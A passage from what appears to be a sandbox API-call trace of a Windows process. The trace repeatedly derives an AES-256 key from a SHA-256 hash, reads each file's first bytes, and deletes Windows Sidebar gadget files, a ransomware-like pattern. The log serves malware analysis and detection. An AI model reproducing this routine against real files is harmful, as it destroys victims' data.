dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.816] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.816] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.816] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.816] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbf6 [0192.816] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.818] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.818] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.818] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.819] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png")) returned 0 [0192.819] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.820] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.820] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.820] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.820] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb46 [0192.820] ReadFile (in: hFile=0x5bc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.822] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.822] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.822] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.823] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png")) returned 0 [0192.824] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.825] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.825] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.825] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.825] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbf6 [0192.825] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.827] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.827] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.827] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.828] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png")) returned 0 [0192.829] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.829] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.829] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.829] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.829] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc05 [0192.830] ReadFile (in: hFile=0x5bc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.832] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.832] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.832] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.833] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png")) returned 0 [0192.834] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.834] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.834] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.835] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.835] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb58 [0192.835] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.837] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.837] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.837] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.838] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png")) returned 0 [0192.839] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.839] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.839] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.839] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.839] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc5a [0192.839] ReadFile (in: hFile=0x5bc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.841] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.841] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.841] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.843] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png")) returned 0 [0192.844] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.844] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.844] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.844] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.844] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc59 [0192.844] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.847] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.847] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.847] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.848] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png")) returned 0 [0192.954] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.954] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.954] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.954] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.954] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xba6 [0192.954] ReadFile (in: hFile=0x5bc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.956] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.956] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.956] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.958] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png")) returned 0 [0192.958] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.959] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.959] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.959] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.959] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x61b80 [0192.959] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.019] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0193.019] CryptDestroyKey (hKey=0x284d668) returned 1 [0193.019] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0193.020] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg")) returned 0 [0193.024] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0193.024] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0193.024] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.024] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0193.024] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1816 [0193.024] ReadFile (in: hFile=0x5b0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0193.045] CryptDestroyHash (hHash=0x284d568) returned 1 [0193.045] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.045] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0193.046] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png")) returned 0 [0193.047] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0193.139] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0193.139] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0193.139] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.139] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0193.139] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3260 [0193.139] ReadFile (in: hFile=0x5bc, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0193.143] CryptDestroyHash (hHash=0x284d668) returned 1 [0193.143] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.143] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.144] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\drag.png")) returned 0 [0193.145] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0193.145] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0193.145] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.146] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.146] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.146] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0193.146] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ce [0193.146] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.148] CryptDestroyHash (hHash=0x284d668) returned 1 [0193.148] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0193.148] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.258] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\localizedsettings.css")) returned 0 [0193.295] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.296] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.296] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.296] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0193.296] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2786 [0193.296] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.299] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0193.299] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0193.299] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.301] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\settings.css")) returned 0 [0193.302] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.302] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.302] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.302] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0193.302] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x603c [0193.302] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.472] CryptDestroyHash (hHash=0x284d668) returned 1 [0193.472] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0193.472] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.474] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\weather.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\weather.css")) returned 0 [0193.560] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.560] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.560] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.560] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0193.560] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7c6 [0193.560] ReadFile (in: hFile=0x5bc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.563] CryptDestroyHash (hHash=0x284d528) returned 1 [0193.563] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0193.563] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.564] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml")) returned 0 [0193.564] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0193.673] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.673] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.673] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.673] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.673] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x71c [0193.673] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.675] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0193.675] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.675] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.676] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\highdpiimageswap.js")) returned 0 [0193.677] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.677] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.677] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.677] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.677] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xab00 [0193.677] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.681] CryptDestroyHash (hHash=0x284d668) returned 1 [0193.682] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.682] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.683] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\library.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\library.js")) returned 0 [0193.685] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.686] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.686] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.686] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.686] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x388c [0193.686] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.689] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0193.689] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.689] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.690] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\localizedStrings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\localizedstrings.js")) returned 0 [0193.691] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.691] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.691] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.691] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.691] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe268 [0193.692] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, 